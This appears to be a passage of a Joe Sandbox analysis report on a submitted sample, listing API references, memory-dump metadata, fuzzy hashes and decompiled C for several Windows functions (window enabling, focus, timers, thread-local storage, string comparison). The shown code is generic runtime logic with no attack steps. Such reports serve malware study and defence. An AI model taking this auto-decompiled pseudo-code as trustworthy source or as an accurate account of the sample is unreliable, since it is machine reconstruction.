                  • GetVersionExA.KERNEL32(?), ref: 0042B19B
                  • _malloc.LIBCMT ref: 0042B1BC
                  • _memset.LIBCMT ref: 0042B1D3
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0042B2D9
                  • CoCreateInstance.OLE32(00463168,00000000), ref: 0042B320
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset$CreateException@8H_prolog3H_prolog3_InitializeInstanceThrowVersion_malloc
                  • String ID: X
                  • API String ID: 4031887728-3081909835
                  • Opcode ID: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction ID: 5172e0a2d860184040d2a6c4a60c16d353be7440ddfd1ca1bccc4f22e79cac10
                  • Opcode Fuzzy Hash: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction Fuzzy Hash: 9A7168B4600755DFDB20DF25C880B9ABBE0FF49308F4045AEE9999B361D738A984CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040A380(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
                  				intOrPtr* _t34;
                  				intOrPtr _t36;
                  				int _t39;
                  				intOrPtr _t46;
                  				signed int _t57;
                  				signed int _t66;
                  				struct HWND__* _t71;
                  				void* _t72;
                  
                  				_t70 = __esi;
                  				_t58 = __ecx;
                  				_push(0x18);
                  				E00431A9B(E0044ACFA, __ebx, __edi, __esi);
                  				_t57 = __ecx;
                  				_t34 = __ecx + 0xb8;
                  				 *_t34 =  *_t34 + 1;
                  				if( *_t34 <= 1) {
                  					_t36 = E004105B2(__ecx, __ecx, __edi);
                  					 *((intOrPtr*)(_t72 - 0x10)) = _t36;
                  					_t77 = _t36;
                  					if(_t36 == 0) {
                  						L2:
                  						E00406436(_t57, _t58, 0, _t70, _t77);
                  					}
                  					 *(_t72 - 0x24) = 0x450028;
                  					 *((intOrPtr*)(_t72 - 0x20)) = 0;
                  					 *((intOrPtr*)(_t72 - 0x14)) = 0;
                  					 *((intOrPtr*)(_t72 - 0x18)) = 0;
                  					 *(_t72 - 0x1c) = 0;
                  					 *(_t72 - 4) = 0;
                  					_t71 = GetWindow(GetDesktopWindow(), 5);
                  					if(_t71 != 0) {
                  						do {
                  							_t39 = IsWindowEnabled(_t71);
                  							_t79 = _t39;
                  							if(_t39 != 0 && E0040EE68(_t58, 0, _t71, _t79, _t71) != 0 && E00408105( *((intOrPtr*)( *((intOrPtr*)(_t72 - 0x10)) + 0x20)), _t71) != 0 && SendMessageA(_t71, 0x36c, 0, 0) == 0) {
                  								EnableWindow(_t71, 0);
                  								_t58 = _t72 - 0x24;
                  								E00409F5C(_t72 - 0x24, _t71);
                  							}
                  							_t71 = GetWindow(_t71, 2);
                  						} while (_t71 != 0);
                  						_t70 =  *(_t72 - 0x1c);
                  						if(_t70 != 0) {
                  							_t86 = _t70 > 0;
                  							if(_t70 > 0) {
                  								goto L2;
                  							} else {
                  								_t66 = 4;
                  								_t46 = E00404461(_t86,  ~(0 | _t86 > 0x00000000) | (_t70 + 0x00000001) * _t66);
                  								_t58 = _t70 << 2;
                  								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
                  								 *((intOrPtr*)((_t70 << 2) + _t46)) = 0;
                  								if((0 |  *((intOrPtr*)(_t72 - 0x20)) != 0x00000000) == 0) {
                  									goto L2;
                  								} else {
                  									E004059F9(0, _t70,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t72 - 0x20)), _t58);
                  								}
                  							}
                  						}
                  					}
                  					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
                  					_t34 = E00409F75(_t72 - 0x24);
                  				}
                  				return E00431B73(_t34);
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040A387
                  • GetDesktopWindow.USER32 ref: 0040A3CA
                  • GetWindow.USER32(00000000), ref: 0040A3D1
                  • IsWindowEnabled.USER32(00000000), ref: 0040A3E2
                  • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0040A40E
                  • EnableWindow.USER32(00000000,00000000), ref: 0040A41A
                  • GetWindow.USER32(00000000,00000002), ref: 0040A42C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$H_prolog3$DesktopEnableEnabledException@8MessageSendThrow
                  • String ID: (
                  • API String ID: 2907971239-3887548279
                  • Opcode ID: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction ID: 3bb135bf242b6c09986745a0261cf98ccff5f01dbf2b9a6c7ca042f580c0f20a
                  • Opcode Fuzzy Hash: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction Fuzzy Hash: 7D31C4359002209FDB11AF668C499AFBAB8FF45300F55453EE812BB1D1EB784D51CB6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E004105DA(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                  				struct HWND__* _v8;
                  				void* __edi;
                  				void* _t12;
                  				void* _t14;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  				void* _t29;
                  				struct HWND__* _t30;
                  				signed int _t34;
                  				void* _t37;
                  				void* _t41;
                  
                  				_t29 = __ebx;
                  				_push(__ecx);
                  				_t37 = __ecx;
                  				_t12 = E004105B2(__ebx, __ecx, __ecx);
                  				_t34 = _a4 & 0x0000fff0;
                  				_t41 = _t12;
                  				_t14 = _t34 - 0xf040;
                  				if(_t14 == 0) {
                  					L11:
                  					if(_a8 != 0x75 || _t41 == 0) {
                  						L15:
                  						_t15 = 0;
                  						goto L16;
                  					} else {
                  						E00412C9D(_t41);
                  						L14:
                  						_t15 = 1;
                  						L16:
                  						return _t15;
                  					}
                  				}
                  				_t18 = _t14 - 0x10;
                  				if(_t18 == 0) {
                  					goto L11;
                  				}
                  				_t19 = _t18 - 0x10;
                  				if(_t19 == 0 || _t19 == 0xa0) {
                  					if(_t34 == 0xf060 || _a8 != 0) {
                  						if(_t41 != 0) {
                  							_push(_t29);
                  							_t30 =  *(_t37 + 0x20);
                  							_v8 = GetFocus();
                  							E0040EE3C(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
                  							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
                  							if(IsWindow(_t30) != 0) {
                  								SetActiveWindow(_t30);
                  							}
                  							if(IsWindow(_v8) != 0) {
                  								SetFocus(_v8);
                  							}
                  						}
                  					}
                  					goto L14;
                  				} else {
                  					goto L15;
                  				}
                  			}
















                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction ID: b4a469e61909f79723e9443e387843b1e68923f1b743ae53d2218e8cd4b0e9e5
                  • Opcode Fuzzy Hash: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction Fuzzy Hash: 1A11B432500205ABDB346F76CD08AEF7B65FBC4310F054436E905926A2DAB8CDE0DA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00421287(intOrPtr* __ecx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagPOINT _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				short _t42;
                  				signed int _t49;
                  				struct HWND__* _t60;
                  				intOrPtr _t63;
                  				intOrPtr* _t64;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr _t83;
                  				void* _t84;
                  				intOrPtr _t85;
                  				struct HWND__* _t87;
                  				intOrPtr _t88;
                  				intOrPtr* _t89;
                  
                  				_t76 = __ecx;
                  				_t89 = __ecx;
                  				_t42 = GetKeyState(1);
                  				_t90 = _t42;
                  				if(_t42 < 0) {
                  					return _t42;
                  				}
                  				_t85 = E0041F396(_t72, _t76, _t84, _t89, _t90);
                  				_v12 = _t85;
                  				GetCursorPos( &_v20);
                  				ScreenToClient( *(_t89 + 0x20),  &_v20);
                  				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
                  				_v8 = _t49;
                  				if(_t49 < 0) {
                  					_t16 = _t85 + 0x4c;
                  					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                  					__eflags =  *_t16;
                  					L18:
                  					if(_v8 < 0) {
                  						L27:
                  						if( *(_v12 + 0x4c) == 0xffffffff) {
                  							KillTimer( *(_t89 + 0x20), 0xe001);
                  						}
                  						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
                  						L30:
                  						_t53 = 0xe000;
                  						if(_a4 == 0xe000) {
                  							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                  							if(_v8 >= 0) {
                  								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
                  							}
                  						}
                  						return _t53;
                  					}
                  					ClientToScreen( *(_t89 + 0x20),  &_v20);
                  					_push(_v20.y);
                  					_t87 = WindowFromPoint(_v20);
                  					if(_t87 == 0) {
                  						L25:
                  						_t59 = _v12;
                  						_v8 = _v8 | 0xffffffff;
                  						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                  						L26:
                  						if(_v8 >= 0) {
                  							goto L30;
                  						}
                  						goto L27;
                  					}
                  					_t60 =  *(_t89 + 0x20);
                  					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                  						goto L26;
                  					} else {
                  						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                  						if(_t63 != 0) {
                  							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                  						}
                  						if(_t63 == _t87) {
                  							goto L26;
                  						} else {
                  							goto L25;
                  						}
                  					}
                  				}
                  				_t64 = E004105B2(_t72, _t89, _t85);
                  				_t81 = _t89;
                  				_t75 = _t64;
                  				if(E004117D8(_t89) == 0) {
                  					L6:
                  					_v8 = _v8 | 0xffffffff;
                  					goto L7;
                  				} else {
                  					_t93 = _t75;
                  					if(_t75 == 0) {
                  						E00406436(_t75, _t81, _t85, _t89, _t93);
                  					}
                  					_t81 = _t75;
                  					if(E00412C5B(_t75) != 0) {
                  						L7:
                  						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                  						if(_t66 != 0) {
                  							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                  						} else {
                  							_t88 = 0;
                  						}
                  						_t68 = E0040EE3C(_t75, _t81, GetCapture());
                  						if(_t68 != _t89) {
                  							if(_t68 != 0) {
                  								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                  							} else {
                  								_t83 = 0;
                  							}
                  							if(_t83 != _t88 && E004105B2(_t75, _t68, _t88) == _t75) {
                  								_v8 = _v8 | 0xffffffff;
                  							}
                  						}
                  						goto L18;
                  					}
                  					goto L6;
                  				}
                  			}


























                  APIs
                  • GetKeyState.USER32(00000001), ref: 00421294
                  • GetCursorPos.USER32(?), ref: 004212B3
                  • ScreenToClient.USER32 ref: 004212C0
                  • GetCapture.USER32 ref: 00421316
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ClientToScreen.USER32(?,?), ref: 0042135D
                  • WindowFromPoint.USER32(?,?), ref: 00421369
                  • IsChild.USER32(?,00000000), ref: 0042137E
                  • KillTimer.USER32(?,0000E001), ref: 004213BB
                  • KillTimer.USER32(?,0000E000), ref: 004213D7
                    • Part of subcall function 004117D8: GetForegroundWindow.USER32 ref: 004117EC
                    • Part of subcall function 004117D8: GetLastActivePopup.USER32(?), ref: 004117FD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
                  • String ID:
                  • API String ID: 1544770960-0
                  • Opcode ID: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction ID: df39ac5b8854794e06a7082f429ff7eac5bcf5f3c278d8809952c039e30c033c
                  • Opcode Fuzzy Hash: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction Fuzzy Hash: F641C631700215EFEB20DBA6DD44AAE7BB6BF54324F50066AE851D76B1EB38DD41CB08
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E004208A9(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t36;
                  				void* _t39;
                  				long _t41;
                  				void* _t42;
                  				long _t47;
                  				void* _t53;
                  				signed int _t55;
                  				long* _t62;
                  				struct _CRITICAL_SECTION* _t64;
                  				void* _t65;
                  				void* _t66;
                  
                  				_push(0x10);
                  				E00431ACE(E0044BED8, __ebx, __edi, __esi);
                  				_t62 = __ecx;
                  				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                  				_t64 = __ecx + 0x1c;
                  				 *(_t66 - 0x14) = _t64;
                  				EnterCriticalSection(_t64);
                  				_t36 =  *(_t66 + 8);
                  				if(_t36 <= 0 || _t36 >= _t62[3]) {
                  					_push(_t64);
                  				} else {
                  					_t65 = TlsGetValue( *_t62);
                  					if(_t65 == 0) {
                  						 *(_t66 - 4) = 0;
                  						_t39 = E00420529(0x10);
                  						__eflags = _t39;
                  						if(__eflags == 0) {
                  							_t65 = 0;
                  							__eflags = 0;
                  						} else {
                  							 *_t39 = 0x453424;
                  							_t65 = _t39;
                  						}
                  						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                  						_t51 =  &(_t62[5]);
                  						 *(_t65 + 8) = 0;
                  						 *(_t65 + 0xc) = 0;
                  						E0042065B( &(_t62[5]), _t65);
                  						goto L5;
                  					} else {
                  						_t55 =  *(_t66 + 8);
                  						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                  							L5:
                  							_t75 =  *(_t65 + 0xc);
                  							if( *(_t65 + 0xc) != 0) {
                  								_t41 = E004148C1(_t51, __eflags, _t62[3], 4);
                  								_t53 = 2;
                  								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                  							} else {
                  								_t47 = E004148C1(_t51, _t75, _t62[3], 4);
                  								_pop(_t53);
                  								_t42 = LocalAlloc(0, _t47);
                  							}
                  							_t76 = _t42;
                  							if(_t42 == 0) {
                  								LeaveCriticalSection( *(_t66 - 0x14));
                  								_t42 = E004063FE(0, _t53, _t62, _t65, _t76);
                  							}
                  							 *(_t65 + 0xc) = _t42;
                  							E00431160(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                  							 *(_t65 + 8) = _t62[3];
                  							TlsSetValue( *_t62, _t65);
                  							_t55 =  *(_t66 + 8);
                  						}
                  					}
                  					_t36 =  *(_t65 + 0xc);
                  					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                  						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                  					}
                  					_push( *(_t66 - 0x14));
                  				}
                  				LeaveCriticalSection();
                  				return E00431B73(_t36);
                  			}















                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004208B0
                  • EnterCriticalSection.KERNEL32(?,00000010,00420B6C,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208C1
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208DF
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420913
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction ID: 5362d1717d03bc6381155a69efb60a9799305f1a3338e288a41fad99fcfcfd1f
                  • Opcode Fuzzy Hash: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction Fuzzy Hash: 683192B5600616AFEB20AF11E881D6AB7F4FF44310B50C52FF51797662C774A990CF88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E004289FF(void* __esi, char* _a4, CHAR* _a8) {
                  				signed int _v8;
                  				short _v528;
                  				short _v1048;
                  				short _v1568;
                  				int _v1572;
                  				char* _v1576;
                  				void* __ebx;
                  				void* __edi;
                  				signed int _t20;
                  				int _t23;
                  				void* _t26;
                  				char* _t35;
                  				CHAR* _t38;
                  				void* _t39;
                  				int _t40;
                  				void* _t45;
                  				char* _t47;
                  				void* _t48;
                  				void* _t52;
                  				signed int _t55;
                  				signed int _t57;
                  
                  				_t49 = __esi;
                  				_t55 = _t57;
                  				_t20 =  *0x463404; // 0x18eab29f
                  				_v8 = _t20 ^ _t55;
                  				_t38 = _a8;
                  				_t47 = _a4;
                  				_v1576 = _t38;
                  				if(lstrcmpiA(_t47, _t38) == 0) {
                  					_t23 = GetSystemMetrics(0x2a);
                  					if(_t23 != 0) {
                  						_push(__esi);
                  						_v1572 = lstrlenA(_t47);
                  						if(_v1572 != lstrlenA(_t38)) {
                  							L14:
                  							_t26 = 0;
                  						} else {
                  							_t40 = GetThreadLocale();
                  							GetStringTypeA(_t40, 1, _t47, 0xffffffff,  &_v1568);
                  							GetStringTypeA(_t40, 4, _t47, 0xffffffff,  &_v528);
                  							GetStringTypeA(_t40, 1, _v1576, 0xffffffff,  &_v1048);
                  							_t35 = _t47;
                  							if( *_t47 == 0) {
                  								L11:
                  								_t26 = 1;
                  							} else {
                  								_t52 = 0;
                  								while(( *(_t55 + _t52 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t55 + _t52 - 0x61c)) ==  *((intOrPtr*)(_t55 + _t52 - 0x414))) {
                  									_t52 = _t52 + 2;
                  									if( *_t35 != 0) {
                  										continue;
                  									} else {
                  										goto L11;
                  									}
                  									goto L12;
                  								}
                  								goto L14;
                  							}
                  						}
                  						L12:
                  						_pop(_t49);
                  					} else {
                  						_t26 = _t23 + 1;
                  					}
                  				} else {
                  					_t26 = 0;
                  				}
                  				_pop(_t48);
                  				_pop(_t39);
                  				return E00430650(_t26, _t39, _v8 ^ _t55, _t45, _t48, _t49);
                  			}

























                  APIs
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • GetSystemMetrics.USER32 ref: 00428A37
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystemlstrcmpi
                  • String ID:
                  • API String ID: 2335526769-0
                  • Opcode ID: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction ID: 79ccf1a60a629e09d7d33ca9d5b2f7e3e78f3aa6161d4a5aaa64ec7c091d6d26
                  • Opcode Fuzzy Hash: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction Fuzzy Hash: 47210E717012286BDB205F65AC44F9F7BACEB89720F5006BBF916D21C1DEB49D41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0041804C(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
                  				signed int _t83;
                  				intOrPtr _t85;
                  				void* _t91;
                  				intOrPtr _t96;
                  				CHAR** _t98;
                  				signed int _t101;
                  				signed int _t103;
                  				signed int _t108;
                  				intOrPtr _t110;
                  				CHAR** _t117;
                  				int _t120;
                  				CHAR** _t122;
                  				int _t125;
                  				signed int _t126;
                  				void* _t130;
                  				void* _t135;
                  				void* _t148;
                  				signed int _t150;
                  				void* _t152;
                  				signed short* _t156;
                  
                  				_t151 = __esi;
                  				_t148 = __edx;
                  				_t131 = __ecx;
                  				_push(0x188);
                  				E00431A9B(E0044B616, __ebx, __edi, __esi);
                  				_t130 = __ecx;
                  				_t150 = 0;
                  				 *(_t152 - 0x10) = 0;
                  				if( *((intOrPtr*)(_t152 + 8)) != 0) {
                  					L29:
                  					_push(_t150);
                  					_push(0x14000c);
                  					_push(1);
                  					E0042A201(_t130, _t152 - 0x194, _t150, _t151, __eflags);
                  					 *(_t152 - 4) = 3;
                  					E0042A489(_t152 - 0x194);
                  					_t83 =  *(_t130 + 0x70);
                  					__eflags = _t83 - _t150;
                  					if(_t83 != _t150) {
                  						E0041FD19(_t83);
                  					}
                  					_t84 =  *(_t130 + 0x74);
                  					__eflags =  *(_t130 + 0x74) - _t150;
                  					if(__eflags != 0) {
                  						E0041FD19(_t84);
                  					}
                  					_t85 =  *((intOrPtr*)(_t152 - 0x120));
                  					 *(_t130 + 0x70) =  *(_t85 + 8);
                  					 *(_t130 + 0x74) =  *(_t85 + 0xc);
                  					 *((intOrPtr*)(_t152 - 0x194)) = 0x452264;
                  					_t76 = _t152 - 0x194; // 0x452264
                  					_t135 = _t76;
                  					L34:
                  					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
                  					_t87 = E004174FB(_t135, _t150, _t151,  *(_t152 - 4));
                  					L35:
                  					return E00431B73(_t87);
                  				}
                  				_t91 =  *(__ecx + 0x74);
                  				if(_t91 == 0) {
                  					goto L29;
                  				}
                  				_t151 = GlobalLock(_t91);
                  				_t156 = _t151;
                  				_t87 = 0 | _t156 == 0x00000000;
                  				_t157 = _t156 == 0;
                  				if(_t156 == 0) {
                  					_t87 = E00406436(_t130, _t131, 0, _t151, _t157);
                  				}
                  				_t158 = _t151[3] & 0x00000001;
                  				if((_t151[3] & 0x00000001) == 0) {
                  					goto L35;
                  				}
                  				_push(_t150);
                  				_push(0x14000c);
                  				_push(1);
                  				E0042A201(_t130, _t152 - 0xd8, _t150, _t151, _t158);
                  				 *(_t152 - 4) = _t150;
                  				if(E0042A489(_t152 - 0xd8) != 0) {
                  					_t96 =  *((intOrPtr*)(_t152 - 0x64));
                  					__eflags =  *((intOrPtr*)(_t96 + 0xc)) - _t150;
                  					if( *((intOrPtr*)(_t96 + 0xc)) != _t150) {
                  						_t98 = E0042A49C(_t152 - 0xd8, _t152 - 0x18);
                  						_t150 = lstrcmpA;
                  						 *(_t152 - 4) = 1;
                  						 *(_t152 - 0x10) = 1;
                  						_t101 = lstrcmpA(_t151 + ( *_t151 & 0x0000ffff),  *_t98);
                  						__eflags = _t101;
                  						if(_t101 != 0) {
                  							L14:
                  							 *((char*)(_t152 + 0xb)) = 1;
                  							L15:
                  							__eflags =  *(_t152 - 0x10) & 0x00000004;
                  							if(( *(_t152 - 0x10) & 0x00000004) != 0) {
                  								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffb;
                  								__eflags =  *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0, _t148);
                  							}
                  							__eflags =  *(_t152 - 0x10) & 0x00000002;
                  							if(( *(_t152 - 0x10) & 0x00000002) != 0) {
                  								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffd;
                  								__eflags =  *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0, _t148);
                  							}
                  							 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
                  							__eflags =  *(_t152 - 0x10) & 0x00000001;
                  							if(( *(_t152 - 0x10) & 0x00000001) != 0) {
                  								__eflags =  *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0, _t148);
                  							}
                  							__eflags =  *((char*)(_t152 + 0xb));
                  							if( *((char*)(_t152 + 0xb)) == 0) {
                  								_t103 =  *( *((intOrPtr*)(_t152 - 0x64)) + 8);
                  								__eflags = _t103;
                  								if(_t103 != 0) {
                  									E0041FD19(_t103);
                  								}
                  								_t105 =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
                  								__eflags =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
                  								if(__eflags != 0) {
                  									E0041FD19(_t105);
                  								}
                  							} else {
                  								_t108 =  *(_t130 + 0x70);
                  								__eflags = _t108;
                  								if(_t108 != 0) {
                  									E0041FD19(_t108);
                  								}
                  								E0041FD19( *(_t130 + 0x74));
                  								_t110 =  *((intOrPtr*)(_t152 - 0x64));
                  								 *(_t130 + 0x70) =  *(_t110 + 8);
                  								 *(_t130 + 0x74) =  *(_t110 + 0xc);
                  							}
                  							goto L6;
                  						}
                  						_t117 = E0042A4CF(_t152 - 0xd8, _t152 - 0x14);
                  						 *(_t152 - 4) = 2;
                  						 *(_t152 - 0x10) = 3;
                  						_t120 = lstrcmpA(_t151 + (_t151[1] & 0x0000ffff),  *_t117);
                  						__eflags = _t120;
                  						if(_t120 != 0) {
                  							goto L14;
                  						}
                  						_t122 = E0042A503(_t152 - 0xd8, _t152 - 0x1c);
                  						 *(_t152 - 0x10) = 7;
                  						_t125 = lstrcmpA(_t151 + (_t151[2] & 0x0000ffff),  *_t122);
                  						 *((char*)(_t152 + 0xb)) = 0;
                  						__eflags = _t125;
                  						if(_t125 == 0) {
                  							goto L15;
                  						}
                  						goto L14;
                  					}
                  					_t126 =  *(_t130 + 0x70);
                  					__eflags = _t126 - _t150;
                  					if(_t126 != _t150) {
                  						E0041FD19(_t126);
                  					}
                  					E0041FD19( *(_t130 + 0x74));
